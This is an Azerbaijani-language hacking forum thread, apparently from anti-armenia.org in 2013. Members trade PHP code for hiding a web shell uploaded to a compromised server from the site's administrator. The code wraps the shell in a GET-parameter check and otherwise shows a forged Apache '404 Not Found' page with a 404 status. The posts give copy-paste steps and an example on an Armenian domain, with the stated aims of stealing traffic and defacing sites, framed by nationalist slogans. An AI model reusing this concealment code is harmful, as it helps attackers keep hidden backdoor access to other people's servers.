| Istifadəçi |
2013-01-28 08:31 GMT |
|
|
|
| Security |
 |
| Mesaj Sayı : 839 |
| Mövzu Sayı : |
| Rep Ver : |
| Rep Sayı : 25 |
Indi Saytda :  |
| Cinsiyyət : Oğlan |
|
| Şəhər : Sumqayıt |
Ölkə :  |
| Məslək : Pan - Turkism |
| Yaş : 34 |
Mesaj :  |
|
Hərdən elə olurki sayta shell upload edəndən sonra onu hacklamaq yox misal üçün traffiki oğurlamaq üçün shell-i serverdə admindən gizlətmək tələb olunur
Sizlərə indi shell-i 404 error adı altında gizlətməyi göstərəcəm
İş üçün bu shelli götürək http://anti-armenia.org/forums.php?m=posts&q=499
Shellin source kodunu baxırıq
Kodun lap əvvəlində <?php dan sonra belə bir kod əlavə edirik
Kod: # id
# shell
if ($_GET['id'] == 'shell'){
və sonra shellin kodunu lap sonuna bu kodu əlavə edirik
Kod: }else{
echo'
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache Server at '.$_SERVER['HTTP_HOST'].' Port 80</address>
';
}
vəssalam , shelli 404.php fayl adı altında save edirik
əgər kimsə brauzerdə 404.php faylını açmaq istəsə ona 404 erroru görsənəcək
shelli açmaq üçün brauzerdə bu url-i açmaq lazımdir
http://site.com/404.php?id=shell
Bura Ergenekon, təpədən-dırnağa Türkəm!
 |
| Anti-armenia.ORG |
 |
| Istifadəçi |
2013-01-28 10:55 GMT |
|
|
|
| Pr0grammer |
 |
| Mesaj Sayı : 1677 |
| Mövzu Sayı : |
| Rep Ver : |
| Rep Sayı : 62 |
| Indi Saytda : |
| Cinsiyyət : Oğlan |
|
| Şəhər : KARABAKH IS AZERBAIJAN! |
| Ölkə : |
| Məslək : |
| Yaş : |
| Mesaj : |
|
Belə daha qəşəngdir)) Çünki yuxarıdakında status code 200 verəcək onunla bilmək olar.
Kod: <?php
$xD='<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache Server at '.$_SERVER['HTTP_HOST'].' Port ' . $_SERVER['SERVER_PORT'] . '</address>' . PHP_EOL;
if(!isset($_GET['id']) || empty($_GET['id']) || !is_string($_GET['id'])){echo $xD;header('Status: 404 Not found!');exit;}?>
<?php
/*Actual backdoor goes here*/
echo '<h1>Welcome to your Shell!</h1>' . PHP_EOL . '<br>' .PHP_EOL;
?> |
| Anti-armenia.ORG |
|
| Istifadəçi |
2013-01-28 12:56 GMT |
|
|
|
| Admin |
|
| Mesaj Sayı : 1875 |
| Mövzu Sayı : |
| Rep Ver : |
| Rep Sayı : 45 |
| Indi Saytda : |
| Cinsiyyət : Oğlan |
|
| Şəhər : Anti-armenia.ORG |
| Ölkə : |
| Məslək : Programmer & Defacer |
| Yaş : 12 |
| Mesaj : |
|
|
| Anti-armenia.ORG |
|
| Istifadəçi |
2013-01-28 13:02 GMT |
|
|
|
| Pr0grammer |
|
| Mesaj Sayı : 1677 |
| Mövzu Sayı : |
| Rep Ver : |
| Rep Sayı : 62 |
| Indi Saytda : |
| Cinsiyyət : Oğlan |
|
| Şəhər : KARABAKH IS AZERBAIJAN! |
| Ölkə : |
| Məslək : |
| Yaş : |
| Mesaj : |
|
@StealtH
if else aləmi qatacaq çünki shellərin əksəriyyəti short_open tags deyil full tagların açılması ilə yazılır.
Başı çıxmayan adam sözsüzki gör nəqədər problem yaşacaq if else edənə qədər.
Mən verdiyim metod isə sadə və daha gözəldir else-ə də heç ehtiyyac yoxdur skript yuxarıdakı yoxlanışda avtomatik özünü çezdirəcək deyə)
@AZE.HacK
Bunu copy/paste elə shellə:
Kod: <?php
$xD='<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache Server at '.$_SERVER['HTTP_HOST'].' Port ' . $_SERVER['SERVER_PORT'] . '</address>' . PHP_EOL;
if(!isset($_GET['id']) || empty($_GET['id']) || !is_string($_GET['id'])){echo $xD;header('Status: 404 Not found!');exit;}?>
//BURDA İSƏ SHELL-İ COPY PASTE ELƏ.
Çağıranda
site.am/bufayl.php?id=loool
[/code]
elə oldu hazır)
|
| Anti-armenia.ORG |
|
| Istifadəçi |
2013-02-01 11:14 GMT |
|
|
|
| İstifadəçi |
 |
| Mesaj Sayı : 4 |
| Mövzu Sayı : |
| Rep Ver : |
| Rep Sayı : 0 |
| Indi Saytda : |
| Cinsiyyət : Oğlan |
|
| Şəhər : |
Ölkə :  |
| Məslək : |
| Yaş : |
| Mesaj : |
|
|
| Anti-armenia.ORG |
|
proqramların heç biri yoxdu məndə bilmirəm hara yükləyim 
